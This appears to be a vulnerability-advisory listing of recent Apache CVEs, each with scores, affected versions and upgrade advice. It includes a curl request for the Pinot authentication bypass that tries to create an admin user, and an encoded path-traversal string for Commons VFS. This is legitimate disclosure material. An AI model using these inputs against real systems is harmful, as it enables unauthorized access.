CVSS: 7.5EPSS: 43%CPEs: 3EXPL: 3CVE-2025-27636 – Apache Camel: Camel Message Header Injection via Improper Filtering
https://notcve.org/view.php?id=CVE-2025-27636
09 Mar 2025 — Bypass/Injection vulnerability in Apache Camel-Bean component under particular conditions. This issue affects Apache Camel: from 4.10.0 through <= 4.10.1, from 4.8.0 through <= 4.8.4, from 3.10.0 through <= 3.22.3. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is only present in the following situation. The user is using one of the following HTTP Servers via one the of the following Camel components * camel-servlet * ca... • https://github.com/akamai/CVE-2025-27636-Apache-Camel-PoC • CWE-178: Improper Handling of Case Sensitivity CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax •
CVSS: 6.4EPSS: 0%CPEs: 3EXPL: 0CVE-2024-38311 – Apache Traffic Server: Request smuggling via pipelining after a chunked message body
https://notcve.org/view.php?id=CVE-2024-38311
06 Mar 2025 — Improper Input Validation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.11, from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue. Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in denial of service, HTTP request smuggling, cache poisoning or incomplete dropping of privileges. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-20: Improper Input Validation •
CVSS: 7.5EPSS: 0%CPEs: 2EXPL: 0CVE-2024-56195 – Apache Traffic Server: Intercept plugins are not access controlled
https://notcve.org/view.php?id=CVE-2024-56195
06 Mar 2025 — Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue. Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in denial of service, HTTP request smuggling, cache poisoning or incomplete dropping of privileges. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-284: Improper Access Control •
CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 0CVE-2024-56196 – Apache Traffic Server: ACL is not fully compatible with older versions
https://notcve.org/view.php?id=CVE-2024-56196
06 Mar 2025 — Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 10.0.4, which fixes the issue. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-284: Improper Access Control •
CVSS: 7.5EPSS: 0%CPEs: 2EXPL: 0CVE-2024-56202 – Apache Traffic Server: Expect header field can unreasonably retain resource
https://notcve.org/view.php?id=CVE-2024-56202
06 Mar 2025 — Expected Behavior Violation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to versions 9.2.9 or 10.0.4 or newer, which fixes the issue. Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in denial of service, HTTP request smuggling, cache poisoning or incomplete dropping of privileges. • https://lists.apache.org/thread/btofzws2yqskk2n7f01r3l1819x01023 • CWE-440: Expected Behavior Violation •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 0CVE-2024-55532 – Apache Ranger: Improper Neutralization of Formula Elements in a CSV File
https://notcve.org/view.php?id=CVE-2024-55532
03 Mar 2025 — Improper Neutralization of Formula Elements in Export CSV feature of Apache Ranger in Apache Ranger Version < 2.6.0. Users are recommended to upgrade to version 2.6.0, which fixes this issue. Improper Neutralization of Formula Elements in Export CSV feature of Apache Ranger in Apache Ranger Version < 2.6.0. Users are recommended to upgrade to version 2.6.0, which fixes this issue. • https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger • CWE-1236: Improper Neutralization of Formula Elements in a CSV File •
CVSS: 6.8EPSS: 0%CPEs: 1EXPL: 0CVE-2024-24778 – Apache StreamPipes: Resources Permission Escalation
https://notcve.org/view.php?id=CVE-2024-24778
03 Mar 2025 — Improper privilege management in a REST interface allowed registered users to access unauthorized resources if the resource ID was know. This issue affects Apache StreamPipes: through 0.95.1. Users are recommended to upgrade to version 0.97.0 which fixes the issue. • https://lists.apache.org/thread/j14w6wghlwwrgfgc6hoz9f94fwxtlgzh • CWE-269: Improper Privilege Management •
CVSS: 9.8EPSS: 4%CPEs: 1EXPL: 0CVE-2024-56325 – Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required
https://notcve.org/view.php?id=CVE-2024-56325
03 Mar 2025 — Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -... • https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v • CWE-288: Authentication Bypass Using an Alternate Path or Channel •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 0CVE-2025-27553 – Apache Commons VFS: Possible path traversal issue when using NameScope.DESCENDENT
https://notcve.org/view.php?id=CVE-2025-27553
28 Feb 2025 — Relative Path Traversal vulnerability in Apache Commons VFS before 2.10.0. The FileObject API in Commons VFS has a 'resolveFile' method that takes a 'scope' parameter. Specifying 'NameScope.DESCENDENT' promises that "an exception is thrown if the resolved file is not a descendent of the base file". However, when the path contains encoded ".." characters (for example, "%2E%2E/bar.txt"), it might return file objects that are not a descendent of the base file, without throwing an exception. This issue affects ... • https://lists.apache.org/thread/cnzqowyw9r2pl263cylmxhnvh41hyjcb • CWE-23: Relative Path Traversal •
CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 0CVE-2025-30474 – Apache Commons VFS: Failing to find an FTP file can reveal the URI's password in an error message
https://notcve.org/view.php?id=CVE-2025-30474
28 Feb 2025 — Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Commons VFS. The FtpFileObject class can throw an exception when a file is not found, revealing the original URI in its message, which may include a password. The fix is to mask the password in the exception message This issue affects Apache Commons VFS: before 2.10.0. Users are recommended to upgrade to version 2.10.0, which fixes the issue. Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache C... • https://issues.apache.org/jira/browse/VFS-169 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •